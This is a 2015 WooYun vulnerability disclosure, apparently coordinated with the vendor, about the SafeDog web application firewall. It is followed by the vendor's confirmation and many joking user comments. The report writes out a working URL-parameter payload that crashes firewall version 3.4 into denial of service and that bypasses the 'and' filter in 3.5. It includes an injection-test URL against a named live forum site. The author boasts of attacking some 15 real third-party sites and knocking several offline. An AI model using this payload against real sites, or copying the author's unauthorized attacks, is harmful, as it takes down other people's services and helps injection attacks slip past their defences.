当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129611

漏洞标题:安全狗拒绝服务/注入绕过(可导致大量网站拒绝服务)

相关厂商:安全狗

漏洞作者: 路人甲

提交时间:2015-07-27 10:15

修复时间:2015-10-26 16:16

公开时间:2015-10-26 16:16

漏洞类型:拒绝服务

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-27: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向第三方安全合作伙伴开放
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

恨他就让他装个安全狗吧。

详细说明:

1.拒绝服务
安全狗的某个版本在处理参数的时候处理不当,导致网站503拒绝服务。另外,该版本应该很常见吧,一共打了15个有狗的站,只有3个打不掉
在url中加入如下参数即可:

a=/*66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666*/&


然后。。。该站就直接503了
虽然安全狗已经推出了最新版,并防止了该程序的崩溃
这是在

QQ图片20150723190137.jpg


QQ图片20150724104857.jpg


但是。。。这服务器上的升级程序是怎么回事?

QQ图片20150724104945.jpg


最好强制升级!
2.注入绕过(对于升级后的安全狗)
本地刚刚下载了个安全狗,肯定是最新的,同样是上面的payload,421个以上的a,最新版的可以bypass掉对‘and’的过滤,但至少421个6,少了就被拦截。
虽然只可以绕过"and"关键字,但是已经可以测试该网址是否存在注入了,详情见证明中的视频,如果还握有其他bypass,还也可以进一步利用。
被拦截:

http://bbs.sdcms.cn/company_/post.aspx?threadid=14669&action=reply&page=1%20and%201=1 and 1=1


放过:

http://bbs.sdcms.cn/company_/post.aspx?a=/*66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666*/&threadid=14669&action=reply&page=1%20and%201=1 and 1=1


所以一共是两种情况,要么被挂掉,要么被绕过。

漏洞证明:

http://dns.aizhan.com/125.76.231.7/
这是个安装了该版本的安全狗的服务器,几乎所有网站都可以被挂掉,其他例子太多了,已经D成功的还有韵达美国官网,艾慕网等
视频地址:http://www.tudou.com/programs/view/SVUiRKopaTs/
密码1234
第二个视频被土豆屏蔽了,只能放百度云。
地址:http://pan.baidu.com/s/1o6JyH42
密码:yn9q

QQ图片20150725004147.png


QQ图片20150725004736.png

修复方案:

重新过滤,强制升级

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-28 16:14

厂商回复:

感谢提交,周一就看到了,到今天才确认是因为这边需要测试,然后也是让研发赶快发个“从3.4升级到3.5”的“补!丁!包!”给3.4版本的用户。
需要说明的是,该漏洞只影响3.4版本,最新的3.5版本是不受影响的,请广大站长放心。考虑到还有好多用户在用3.4版本的安全狗,所以这次的影响认定为“高”。
最后,欢迎白帽子对最新的3.5版进行测试,我们将公正的进行裁定,对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。
最后的最后,本次的补丁将自(强)动(行)下(升)发(级),将版本提至3.5,请广大站长放心!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-07-27 10:21 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    so屌!!

  2. 2015-07-27 10:25 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    恨他就让他装个安全狗吧

  3. 2015-07-27 10:32 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)

    恨他就让他装个安全狗吧

  4. 2015-07-27 10:58 | zhiher ( 路人 | Rank:16 漏洞数:4 )

    恨他就让他装个安全狗吧

  5. 2015-07-27 11:04 | levin ( 路人 | Rank:2 漏洞数:2 | print("hello world!"))

    mark!!!

  6. 2015-07-27 11:26 | 1c3z ( 普通白帽子 | Rank:221 漏洞数:45 | #)

    果然是下面牛!!

  7. 2015-07-27 11:26 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1707 漏洞数:273 | ...........................................)

    为啥匿名?

  8. 2015-07-27 11:54 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    反噬神技!

  9. 2015-07-27 12:13 | Me_Fortune ( 普通白帽子 | Rank:220 漏洞数:78 | The quiter you are,the more you're able ...)

    @range

  10. 2015-07-27 12:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    求个shell

  11. 2015-07-27 12:19 | range ( 普通白帽子 | Rank:153 漏洞数:32 | 这个人有点懒,没有写个人简介)

    @Me_Fortune 略屌

  12. 2015-07-27 12:21 | 带头大哥 ( 普通白帽子 | Rank:319 漏洞数:100 | 很早前,我就有个梦想。哪一天能站在国家会...)

    啥都不说了,下午买包烟带上来!

  13. 2015-07-27 12:23 | Azui ( 路人 | Rank:25 漏洞数:10 | 用一只黑色铅笔画一出舞台默剧。)

    下面牛就是牛。

  14. 2015-07-27 12:24 | 带头大哥 ( 普通白帽子 | Rank:319 漏洞数:100 | 很早前,我就有个梦想。哪一天能站在国家会...)

    /呲牙 坐等安全狗

  15. 2015-07-27 12:41 | zhc矜持 ( 路人 | Rank:0 漏洞数:2 | ashq)

    mark!!!

  16. 2015-07-27 12:59 | IOT ( 实习白帽子 | Rank:31 漏洞数:3 | 不知道什么时候才有很多人知道我呢)

    终于出来杀狗的了!叫你装狗!!!

  17. 2015-07-27 13:31 | Mieless ( 实习白帽子 | Rank:33 漏洞数:9 | 我是来打酱油的。)

    牛逼

  18. 2015-07-27 13:45 | 夸父追日 ( 实习白帽子 | Rank:40 漏洞数:6 | 喝最烈的酒,日最疯的狗)

    吓的我赶紧把狗卸载掉了,卧槽 吓死我了

  19. 2015-07-27 14:39 | 泪雨无魂 ( 普通白帽子 | Rank:147 漏洞数:45 )

    恨他就让他装个安全狗吧

  20. 2015-07-27 14:59 | zhiher ( 路人 | Rank:16 漏洞数:4 )

    @xsser 求审核http://www.wooyun.org/bugs/wooyun-2015-0129426/trace/696b089fc73877870e8fdc8f8034ca61

  21. 2015-07-27 15:03 | 小将 ( 路人 | Rank:14 漏洞数:5 | --)

    你是怎么做到的亲!

  22. 2015-07-27 15:07 | range ( 普通白帽子 | Rank:153 漏洞数:32 | 这个人有点懒,没有写个人简介)

    坐等5rank

  23. 2015-07-27 16:04 | Format_smile ( 普通白帽子 | Rank:201 漏洞数:74 | ···孰能无过,谁是谁非!渗透穷三代,黑...)

    杀狗牛

  24. 2015-07-27 16:08 | Mowen ( 路人 | Rank:6 漏洞数:3 | 没个性,不签名!)

    求shell

  25. 2015-07-27 20:11 | 正好五个字 ( 实习白帽子 | Rank:93 漏洞数:15 )

    貌似之前看到过?

  26. 2015-07-27 20:57 | Soulmk ( 路人 | Rank:6 漏洞数:2 | 过来学习~~)

    坐等公布

  27. 2015-07-27 23:52 | GrayTrack ( 实习白帽子 | Rank:83 漏洞数:16 | TXTSEC信息安全团队)

    爱他就让他装个安全狗吧。

  28. 2015-07-29 09:58 | 带头大哥 ( 普通白帽子 | Rank:319 漏洞数:100 | 很早前,我就有个梦想。哪一天能站在国家会...)

    请客吃饭!!!

  29. 2015-07-29 10:02 | JGHOOluwa ( 普通白帽子 | Rank:301 漏洞数:50 | 就是来看看大牛们如何超神的^-^)

    汪汪汪

  30. 2015-07-29 12:50 | Tren ( 实习白帽子 | Rank:97 漏洞数:42 | 求带求装B)

    终于有杀狗的了!!!

  31. 2015-07-29 13:38 | b34r ( 路人 | Rank:2 漏洞数:2 | 4 b34r)

    围观大牛,哈哈

  32. 2015-07-29 13:39 | 乌云合作伙伴-绿盟(乌云厂商)

    @range

  33. 2015-07-29 13:40 | 带头大哥 ( 普通白帽子 | Rank:319 漏洞数:100 | 很早前,我就有个梦想。哪一天能站在国家会...)

    @乌云合作伙伴-绿盟 我去,你怎么知道。

  34. 2015-07-29 13:55 | 安全狗(乌云厂商)

    @乌云合作伙伴-绿盟 我都不知道是谁,这你都知道?

  35. 2015-07-29 18:07 | Me_Fortune ( 普通白帽子 | Rank:220 漏洞数:78 | The quiter you are,the more you're able ...)

    @乌云合作伙伴-绿盟 这货到处装逼啊。。哈哈

  36. 2015-07-31 16:26 | 幻老头儿 ( 普通白帽子 | Rank:148 漏洞数:31 | 新手上路。)

    这个不会忘记你们的……听起来慎得慌

  37. 2015-07-31 16:28 | 安全狗(乌云厂商)

    @幻老头儿 放心,我们不咬人!

  38. 2015-07-31 16:33 | sOnsec ( 普通白帽子 | Rank:100 漏洞数:27 | 安全是什么...)

    ....

  39. 2015-07-31 19:21 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    要紧

  40. 2015-08-01 11:29 | 背影 ( 路人 | Rank:25 漏洞数:3 )

    1000到手~

  41. 2015-08-01 13:23 | Me_Fortune ( 普通白帽子 | Rank:220 漏洞数:78 | The quiter you are,the more you're able ...)

    @背影 一万

  42. 2015-08-01 14:37 | qdq ( 路人 | Rank:2 漏洞数:1 | 有关部门)

    某主机卫士是不是更靠谱一些

  43. 2015-08-01 19:24 | 半块西瓜皮 ( 实习白帽子 | Rank:56 漏洞数:6 | 无)

    就是叼

  44. 2015-08-02 00:39 | range ( 普通白帽子 | Rank:153 漏洞数:32 | 这个人有点懒,没有写个人简介)

    @半块西瓜皮 我擦,西瓜牛都出来了

  45. 2015-08-02 13:00 | 冉阿让 ( 普通白帽子 | Rank:148 漏洞数:31 | Come from Greets.py)

    对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。

  46. 2015-08-03 12:25 | ByL ( 路人 | Rank:10 漏洞数:3 | 早起的虫儿被鸟吃!)

    对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。

  47. 2015-08-04 12:12 | ifk ( 路人 | Rank:25 漏洞数:5 | 无)

    @range 就为了评论你 我都注册乌云了! 哈哈哈~ 膜拜~~

  48. 2015-08-04 17:01 | range ( 普通白帽子 | Rank:153 漏洞数:32 | 这个人有点懒,没有写个人简介)

    @ifk 66666

  49. 2015-08-05 08:31 | sqlfeng ( 普通白帽子 | Rank:195 漏洞数:32 | 不会弹吉它的黑客不是好歌手)

    对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。

  50. 2015-08-05 10:50 | huoji ( 实习白帽子 | Rank:41 漏洞数:10 | 目标是当个农民)

    对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。

  51. 2015-08-05 11:09 | 北风 ( 路人 | Rank:0 漏洞数:1 | 24K纯屌丝,见框就xss小王子)

    对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。

  52. 2015-10-26 17:06 | AgeloVito ( 路人 | Rank:8 漏洞数:2 | Just do what i love, enjoy it and try my...)

    恨他就让他装个安全狗吧

  53. 2015-10-26 20:41 | 老实先生 ( 路人 | Rank:17 漏洞数:8 | 只会注不会shell)

    有技术含量